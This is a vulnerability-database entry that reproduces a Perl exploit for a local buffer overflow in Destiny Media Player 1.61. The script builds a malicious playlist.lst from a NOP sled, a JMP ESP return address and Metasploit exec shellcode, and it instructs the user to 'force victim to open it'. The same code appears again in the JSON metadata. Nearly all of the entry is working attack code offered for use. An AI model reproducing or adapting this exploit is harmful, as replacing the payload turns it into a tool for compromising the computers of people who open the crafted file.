Search...

Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)

2014-07-01T00:00:00

ID SSV:66129
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/user/bin/perl
#Destiny Media Player 1.61 Local BoF Code
#Exploit Coded by : sCORPINo
#Snoop Security Researching Committe 
#originally discovered by: Encrypt3d.M!nd

# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
$shellcode =
&#34;\x6a\x1e\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64&#34; .
&#34;\xfc\xb1\x5d\x83\xeb\xfc\xe2\xf4\x98\x14\xf5\x5d\x64\xfc&#34; .
&#34;\x3a\x18\x58\x77\xcd\x58\x1c\xfd\x5e\xd6\x2b\xe4\x3a\x02&#34; .
&#34;\x44\xfd\x5a\x14\xef\xc8\x3a\x5c\x8a\xcd\x71\xc4\xc8\x78&#34; .
&#34;\x71\x29\x63\x3d\x7b\x50\x65\x3e\x5a\xa9\x5f\xa8\x95\x59&#34; .
&#34;\x11\x19\x3a\x02\x40\xfd\x5a\x3b\xef\xf0\xfa\xd6\x3b\xe0&#34; .
&#34;\xb0\xb6\xef\xe0\x3a\x5c\x8f\x75\xed\x79\x60\x3f\xee\x6c&#34; .
&#34;\x92\x9c\xe7\x39\xef\xba\x81\xd6\x24\xf0\x3a\x2d\x78\x51&#34; .
&#34;\x3a\x35\x6c\x75\x49\xde\xa4\x96\xe1\x35\x8b\x32\x51\x3d&#34; .
&#34;\x0c\x64\x4f\xd7\x6a\xab\x4e\xba\x07\x9d\xdd\x3e\x64\xfc&#34; .
&#34;\xb1\x5d&#34;;
$nops = &#34;\x90&#34; x 2052;  	 #fill the buffer
$nops2 = &#34;\x90&#34; x 100;		 #fill the buffer more:p
$eip = &#34;\x65\x82\xA5\x7c&#34;;	 #7CA58265 JMP ESP
$attack = $nops.$eip.$nops.$shellcode; #sandwich
$playlist=&#34;playlist.lst&#34;;    #playlist name,chage it to anything you want
intro();

open($FILE, &#34;&#62;$playlist&#34;);
print $FILE $attack;
close($FILE);
print &#34;\n\n\n$playlist created beside this exploit.\n&#34;;
print &#34;force victim to open it with Destiny Media Player 1.61\n&#34;;
print &#34;good luck\n\n&#34;;

sub intro{
print qq(
############################################################
##        Snoop Security Researching Committe             ##
##               www.snoop-security.com                   ##
##                    sCORPINo                            ##
## Destiny Media Player 1.61 Local BoF Code               ##
## found by:                                              ##
## http://www.milw0rm.com/exploits/7652                   ##
## special tnX to:                                        ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with                ##
## Destiny Media Player.then BOOM !                       ##
############################################################
);
}

# milw0rm.com [2009-01-04]

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T14:43:17", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T14:43:17", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:43:17", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-66129", "references": [], "enchantments_done": [], "id": "SSV:66129", "title": "Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/user/bin/perl\r\n#Destiny Media Player 1.61 Local BoF Code\r\n#Exploit Coded by : sCORPINo\r\n#Snoop Security Researching Committe \r\n#originally discovered by: Encrypt3d.M!nd\r\n\r\n# windows/exec - 142 bytes\r\n# http://www.metasploit.com\r\n# Encoder: x86/fnstenv_mov\r\n# EXITFUNC=thread, CMD=calc\r\n$shellcode =\r\n"\\x6a\\x1e\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x64" .\r\n"\\xfc\\xb1\\x5d\\x83\\xeb\\xfc\\xe2\\xf4\\x98\\x14\\xf5\\x5d\\x64\\xfc" .\r\n"\\x3a\\x18\\x58\\x77\\xcd\\x58\\x1c\\xfd\\x5e\\xd6\\x2b\\xe4\\x3a\\x02" .\r\n"\\x44\\xfd\\x5a\\x14\\xef\\xc8\\x3a\\x5c\\x8a\\xcd\\x71\\xc4\\xc8\\x78" .\r\n"\\x71\\x29\\x63\\x3d\\x7b\\x50\\x65\\x3e\\x5a\\xa9\\x5f\\xa8\\x95\\x59" .\r\n"\\x11\\x19\\x3a\\x02\\x40\\xfd\\x5a\\x3b\\xef\\xf0\\xfa\\xd6\\x3b\\xe0" .\r\n"\\xb0\\xb6\\xef\\xe0\\x3a\\x5c\\x8f\\x75\\xed\\x79\\x60\\x3f\\xee\\x6c" .\r\n"\\x92\\x9c\\xe7\\x39\\xef\\xba\\x81\\xd6\\x24\\xf0\\x3a\\x2d\\x78\\x51" .\r\n"\\x3a\\x35\\x6c\\x75\\x49\\xde\\xa4\\x96\\xe1\\x35\\x8b\\x32\\x51\\x3d" .\r\n"\\x0c\\x64\\x4f\\xd7\\x6a\\xab\\x4e\\xba\\x07\\x9d\\xdd\\x3e\\x64\\xfc" .\r\n"\\xb1\\x5d";\r\n$nops = "\\x90" x 2052; \t #fill the buffer\r\n$nops2 = "\\x90" x 100;\t\t #fill the buffer more:p\r\n$eip = "\\x65\\x82\\xA5\\x7c";\t #7CA58265 JMP ESP\r\n$attack = $nops.$eip.$nops.$shellcode; #sandwich\r\n$playlist="playlist.lst"; #playlist name,chage it to anything you want\r\nintro();\r\n\r\nopen($FILE, ">$playlist");\r\nprint $FILE $attack;\r\nclose($FILE);\r\nprint "\\n\\n\\n$playlist created beside this exploit.\\n";\r\nprint "force victim to open it with Destiny Media Player 1.61\\n";\r\nprint "good luck\\n\\n";\r\n\r\nsub intro{\r\nprint qq(\r\n############################################################\r\n## Snoop Security Researching Committe ##\r\n## www.snoop-security.com ##\r\n## sCORPINo ##\r\n## Destiny Media Player 1.61 Local BoF Code ##\r\n## found by: ##\r\n## http://www.milw0rm.com/exploits/7652 ##\r\n## special tnX to: ##\r\n## Shahriyar, Adel, Alireza, Yashar and all snoop members ##\r\n## just run and open the playlist.lst with ##\r\n## Destiny Media Player.then BOOM ! ##\r\n############################################################\r\n);\r\n}\r\n\r\n# milw0rm.com [2009-01-04]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66129", "type": "seebug"}